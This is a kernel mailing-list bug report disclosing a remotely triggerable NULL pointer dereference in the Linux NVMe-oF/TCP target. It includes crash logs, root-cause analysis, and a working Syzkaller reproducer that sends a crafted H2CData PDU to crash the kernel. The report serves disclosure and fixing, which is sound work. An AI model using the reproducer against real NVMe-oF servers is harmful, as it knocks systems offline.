[Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_build_iovec`

Alon Zahavi zahavi.alon at gmail.com
Wed Nov 15 01:35:40 PST 2023


Just sending another reminder for this issue.
Until a fix lands, this remains a remotely triggerable denial of service.

On Mon, 6 Nov 2023 at 15:40, Alon Zahavi <zahavi.alon at gmail.com> wrote:
>
> # Bug Overview
>
> ## The Bug
> A NULL pointer dereference in `nvmet_tcp_build_pdu_iovec`.
>
> ## Bug Location
> `drivers/nvme/target/tcp.c` in the function `nvmet_tcp_build_pdu_iovec`.
>
> ## Bug Class
> Remote Denial of Service
>
> ## Disclaimer
> This bug was found using Syzkaller with NVMe-oF/TCP support added.
>
> # Technical Details
>
> ## Kernel Report - NULL Pointer Dereference
> ```
> [  157.833470] BUG: kernel NULL pointer dereference, address:
> 000000000000000c
> [  157.833478] #PF: supervisor read access in kernel mode
> [  157.833484] #PF: error_code(0x0000) - not-present page
> [  157.833490] PGD 126e40067 P4D 126e40067 PUD 130d16067 PMD 0
> [  157.833506] Oops: 0000 [#1] PREEMPT SMP NOPTI
> [  157.833515] CPU: 3 PID: 3067 Comm: kworker/3:3H Kdump: loaded Not
> tainted 6.5.0-rc1+ #5
> [  157.833525] Hardware name: VMware, Inc. VMware Virtual
> Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
> [  157.833532] Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
> [  157.833546] RIP: 0010:nvmet_tcp_build_pdu_iovec+0x7a/0x120
> [  157.833558] Code: fe 44 89 a3 20 02 00 00 49 c1 e4 05 4c 03 63 30
> 4c 89 75 d0 41 89 c6 e8 34 b8 18 ff 45 85 ff 0f 84 99 00 00 00 e8 06
> bd 18 ff <41> 8b 74 24 0c 41 8b 44 24 08 4c 89 e7 49 8b 0c 24 89 f2 41
> 89 75
> [  157.833568] RSP: 0018:ffffc9001ab83c28 EFLAGS: 00010293
> [  157.833576] RAX: 0000000000000000 RBX: ffff88812b9583e0 RCX: 0000000000000000
> [  157.833584] RDX: ffff888131b10000 RSI: ffffffff82191dda RDI: ffffffff82191dcc
> [  157.833591] RBP: ffffc9001ab83c58 R08: 0000000000000005 R09: 0000000000000000
> [  157.833598] R10: 0000000000000007 R11: 0000000000000000 R12: 0000000000000000
> [  157.833605] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000007
> [  157.833612] FS:  0000000000000000(0000) GS:ffff888233f80000(0000)
> knlGS:0000000000000000
> [  157.833630] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [  157.833638] CR2: 000000000000000c CR3: 0000000122dd4002 CR4: 00000000007706e0
> [  157.833659] PKRU: 55555554
> [  157.833686] Call Trace:
> [  157.833691]  <TASK>
> [  157.833712]  ? show_regs+0x6e/0x80
> [  157.833745]  ? __die+0x29/0x70
> [  157.833757]  ? page_fault_oops+0x278/0x740
> [  157.833784]  ? up+0x3b/0x70
> [  157.833835]  ? do_user_addr_fault+0x63b/0x1040
> [  157.833846]  ? __sanitizer_cov_trace_const_cmp4+0x1a/0x20
> [  157.833862]  ? irq_work_queue+0x95/0xc0
> [  157.833874]  ? exc_page_fault+0xcf/0x390
> [  157.833889]  ? asm_exc_page_fault+0x2b/0x30
> [  157.833925]  ? nvmet_tcp_build_pdu_iovec+0x7a/0x120
> [  157.833958]  ? nvmet_tcp_build_pdu_iovec+0x6c/0x120
> [  157.833971]  ? nvmet_tcp_build_pdu_iovec+0x7a/0x120
> [  157.833998]  ? nvmet_tcp_build_pdu_iovec+0x7a/0x120
> [  157.834011]  nvmet_tcp_try_recv_pdu+0x995/0x1310
> [  157.834066]  nvmet_tcp_io_work+0xe6/0xd90
> [  157.834081]  process_one_work+0x3da/0x870
> [  157.834112]  worker_thread+0x67/0x640
> [  157.834124]  kthread+0x164/0x1b0
> [  157.834138]  ? __pfx_worker_thread+0x10/0x10
> [  157.834148]  ? __pfx_kthread+0x10/0x10
> [  157.834162]  ret_from_fork+0x29/0x50
> [  157.834180]  </TASK>
> ```
>
> ## Description
>
> ### Tracing The Bug
> As noted above, the bug occurs during the execution of
> `nvmet_tcp_build_pdu_iovec`. The kernel report points at the exact
> line of code that triggers the bug.
>
> Code Block 1:
> ```
> static void nvmet_tcp_build_pdu_iovec(struct nvmet_tcp_cmd *cmd)
> {
>   ...
>   sg = &cmd->req.sg[cmd->sg_idx]; // #1
>
>   while (length) {
>     u32 iov_len = min_t(u32, length, sg->length - sg_offset); // #2
>   ...
>   }
> ...
> }
> ```
> Breakdown:
>
> 1. The variable `sg` is assigned `&cmd->req.sg[cmd->sg_idx]`.
> At the assembly level (Intel flavor):
> ```
> mov    DWORD PTR [rbx+0x220], r12d  ; r12d holds `cmd->sg_idx`
> add    r12, QWORD PTR [rbx+0x30]    ; add the `cmd->req.sg` base pointer
> ```
>
> However, `cmd->req.sg` is NULL at this point of execution, so `sg`
> will point to `0 + cmd->sg_idx`, most likely 0x0 or 0x1, both
> non-accessible memory addresses.
>
> 2. After moving the address into `sg`, the driver dereferences it
> later, inside the while loop:
> ```
> mov    esi, DWORD PTR [r12+0xc]    ; reads `sg->length`
> ```
> At this point `r12` (most likely) points to 0x0, so the CPU attempts
> to read memory address 0xC and triggers the NULL pointer dereference.
>
>
> ## Root Cause
> `req` is initialized during `nvmet_req_init`. However, the sequence
> that leads into `nvmet_tcp_build_iovec` does not contain any call for
> `nvmet_req_init`, thus crashing the kernel with NULL pointer
> dereference. This flow of execution can also create a situation where
> an uninitialized memory address will be dereferenced, which has
> undefined behaviour.
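>
> One possible hardening direction (a userspace sketch of the idea
> only, with hypothetical stand-in structures and names, not an actual
> patch) would be to reject a data PDU whose command never had its
> scatter-gather list set up:
>
> ```c
> #include <stdio.h>
> #include <errno.h>
> #include <stddef.h>
>
> /* Hypothetical stand-ins for the nvmet structures; a sketch of the
>  * missing-validation idea, not the actual driver code. */
> struct scatterlist   { unsigned int offset, length; };
> struct nvmet_req     { struct scatterlist *sg; };
> struct nvmet_tcp_cmd { struct nvmet_req req; unsigned int sg_idx; };
>
> /* Refuse to build the iovec for a command whose sg list was never
>  * initialized (i.e. nvmet_req_init never ran for it). */
> static int build_pdu_iovec_checked(struct nvmet_tcp_cmd *cmd)
> {
> 	if (!cmd->req.sg)
> 		return -EPROTO;   /* reject the unsolicited data PDU */
> 	/* ... safe to index cmd->req.sg[cmd->sg_idx] here ... */
> 	return 0;
> }
>
> int main(void)
> {
> 	struct nvmet_tcp_cmd bad  = { .req = { .sg = NULL }, .sg_idx = 0 };
> 	struct scatterlist   sgl  = { .offset = 0, .length = 4096 };
> 	struct nvmet_tcp_cmd good = { .req = { .sg = &sgl }, .sg_idx = 0 };
>
> 	printf("bad:  %d\n", build_pdu_iovec_checked(&bad));
> 	printf("good: %d\n", build_pdu_iovec_checked(&good));
> 	return 0;
> }
> ```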
>
> ## Reproducer
> I am adding a reproducer generated by Syzkaller with some
> optimizations and minor changes.
>
> ```
> // autogenerated by syzkaller (https://github.com/google/syzkaller)
>
> #define _GNU_SOURCE
>
> #include <endian.h>
> #include <errno.h>
> #include <fcntl.h>
> #include <sched.h>
> #include <stdarg.h>
> #include <stdbool.h>
> #include <stdint.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/mount.h>
> #include <sys/prctl.h>
> #include <sys/resource.h>
> #include <sys/stat.h>
> #include <sys/syscall.h>
> #include <sys/time.h>
> #include <sys/types.h>
> #include <sys/wait.h>
> #include <unistd.h>
>
> #include <linux/capability.h>
>
> uint64_t r[1] = {0xffffffffffffffff};
>
> void loop(void)
> {
>   intptr_t res = 0;
>   res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
>   if (res != -1)
>     r[0] = res;
>   *(uint16_t*)0x20000100 = 2;
>   *(uint16_t*)0x20000102 = htobe16(0x1144);
>   *(uint32_t*)0x20000104 = htobe32(0x7f000001);
>   syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
>   *(uint8_t*)0x200001c0 = 0;
>   *(uint8_t*)0x200001c1 = 0;
>   *(uint8_t*)0x200001c2 = 0x80;
>   *(uint8_t*)0x200001c3 = 0;
>   *(uint32_t*)0x200001c4 = 0x80;
>   *(uint16_t*)0x200001c8 = 0;
>   *(uint8_t*)0x200001ca = 0;
>   *(uint8_t*)0x200001cb = 0;
>   *(uint32_t*)0x200001cc = 0;
>   memcpy((void*)0x200001d0,
>          "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
>          "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
>          "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35"
>          "\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
>          "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
>          "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
>          "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86",
>          112);
>   syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
>           /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
>   *(uint8_t*)0x20000080 = 6;
>   *(uint8_t*)0x20000081 = 3;
>   *(uint8_t*)0x20000082 = 0x18;
>   *(uint8_t*)0x20000083 = 0x1c;
>   *(uint32_t*)0x20000084 = 2;
>   *(uint16_t*)0x20000088 = 0x5d;
>   *(uint16_t*)0x2000008a = 3;
>   *(uint32_t*)0x2000008c = 0;
>   *(uint32_t*)0x20000090 = 7;
>   memcpy((void*)0x20000094, "\x83\x9e\x4f\x1a", 4);
>   syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x20000080ul, /*len=*/0x80ul,
>           /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
> }
> int main(void)
> {
>   syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
>           /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>   syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
>           /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>   syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
>           /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>   loop();
>   return 0;
> }
> ```
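>
> If it helps triage: my reading of the two sendto() payloads, assuming
> the on-wire layout in include/linux/nvme-tcp.h (please double-check
> against the tree), is that the first is a well-formed 128-byte ICReq,
> while the second is an H2CData PDU (type 6) carrying data for a
> command that was never submitted, which is what reaches
> `nvmet_tcp_build_pdu_iovec` with no sg list. A decoded sketch of the
> second PDU:
>
> ```c
> #include <stdio.h>
> #include <stdint.h>
>
> /* Layouts matching my reading of include/linux/nvme-tcp.h;
>  * an assumption, for illustration only. */
> struct nvme_tcp_hdr {
> 	uint8_t  type;
> 	uint8_t  flags;
> 	uint8_t  hlen;
> 	uint8_t  pdo;
> 	uint32_t plen;
> } __attribute__((packed));
>
> struct nvme_tcp_data_pdu {
> 	struct nvme_tcp_hdr hdr;
> 	uint16_t command_id;
> 	uint16_t ttag;
> 	uint32_t data_offset;
> 	uint32_t data_length;
> 	uint8_t  rsvd[4];
> } __attribute__((packed));
>
> int main(void)
> {
> 	/* The bytes the reproducer writes at 0x20000080 for the second sendto() */
> 	struct nvme_tcp_data_pdu pdu = {
> 		.hdr = { .type = 6, .flags = 3, .hlen = 0x18, .pdo = 0x1c, .plen = 2 },
> 		.command_id  = 0x5d,   /* no command with this ID was ever sent */
> 		.ttag        = 3,
> 		.data_offset = 0,
> 		.data_length = 7,
> 	};
>
> 	printf("sizeof(data_pdu) = %zu\n", sizeof(pdu)); /* hlen says 0x18 = 24 */
> 	printf("type = %u (H2CData)\n", pdu.hdr.type);
> 	printf("command_id = 0x%x\n", pdu.command_id);
> 	return 0;
> }
> ```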
>
> ### More information
> When trying to reproduce it, this bug sometimes changes from a
> null-ptr-deref into an OOM (out of memory) panic.
> This implies that another memory corruption may occur before the NULL
> dereference. I could not find the root cause of the OOM bug, but I am
> attaching the kernel log for it below.
> ```
> [    2.075100] Out of memory and no killable processes...
> [    2.075107] Kernel panic - not syncing: System is deadlocked on memory
> [    2.075303] CPU: 0 PID: 22 Comm: kworker/u2:1 Not tainted 6.5.0-rc1+ #5
> [    2.075428] Hardware name: VMware, Inc. VMware Virtual
> Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
> [    2.075608] Workqueue: eval_map_wq tracer_init_tracefs_work_func
> [    2.075733] Call Trace:
> [    2.075786]  <TASK>
> [    2.075836]  dump_stack_lvl+0xaa/0x110
> [    2.075921]  dump_stack+0x19/0x20
> [    2.075997]  panic+0x567/0x5b0
> [    2.076075]  ? out_of_memory+0xb01/0xb10
> [    2.076167]  out_of_memory+0xb0d/0xb10
> [    2.076272]  __alloc_pages+0xe87/0x1220
> [    2.076358]  ? mark_held_locks+0x4d/0x80
> [    2.076467]  alloc_pages+0xd7/0x200
> [    2.076552]  allocate_slab+0x37e/0x500
> [    2.076636]  ? mark_held_locks+0x4d/0x80
> [    2.076726]  ? __sanitizer_cov_trace_const_cmp4+0x1a/0x20
> [    2.076806]  ___slab_alloc+0x9c6/0x1250
> [    2.076806]  ? __d_alloc+0x3d/0x2f0
> [    2.076806]  kmem_cache_alloc_lru+0x45e/0x5d0
> [    2.076806]  ? kmem_cache_alloc_lru+0x45e/0x5d0
> [    2.076806]  ? __d_alloc+0x3d/0x2f0
> [    2.076806]  __d_alloc+0x3d/0x2f0
> [    2.076806]  ? __d_alloc+0x3d/0x2f0
> [    2.076806]  d_alloc_parallel+0x75/0x1040
> [    2.076806]  ? lockdep_init_map_type+0x50/0x240
> [    2.076806]  __lookup_slow+0xf4/0x2a0
> [    2.076806]  lookup_one_len+0xde/0x100
> [    2.076806]  start_creating+0xaf/0x180
> [    2.076806]  tracefs_create_file+0xa2/0x260
> [    2.076806]  trace_create_file+0x38/0x70
> [    2.076806]  event_create_dir+0x4c0/0x6e0
> [    2.076806]  __trace_early_add_event_dirs+0x57/0x100
> [    2.076806]  event_trace_init+0xe4/0x160
> [    2.076806]  tracer_init_tracefs_work_func+0x15/0x440
> [    2.076806]  process_one_work+0x3da/0x870
> [    2.076806]  worker_thread+0x67/0x640
> [    2.076806]  kthread+0x164/0x1b0
> [    2.076806]  ? __pfx_worker_thread+0x10/0x10
> [    2.076806]  ? __pfx_kthread+0x10/0x10
> [    2.076806]  ret_from_fork+0x29/0x50
> [    2.076806]  </TASK>
> [    2.076806] ---[ end Kernel panic - not syncing: System is
> deadlocked on memory ]---
> ```
> If you figure out what caused the OOM, please let me know.
>
> ## About this report
> This report is almost identical to another report I sent you, titled
> "[Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in
> __nvmet_req_complete". The root cause seems to be the same, and both
> bugs sometimes cause an OOM kernel panic. If you think these bugs
> should be addressed as one, please let me know.


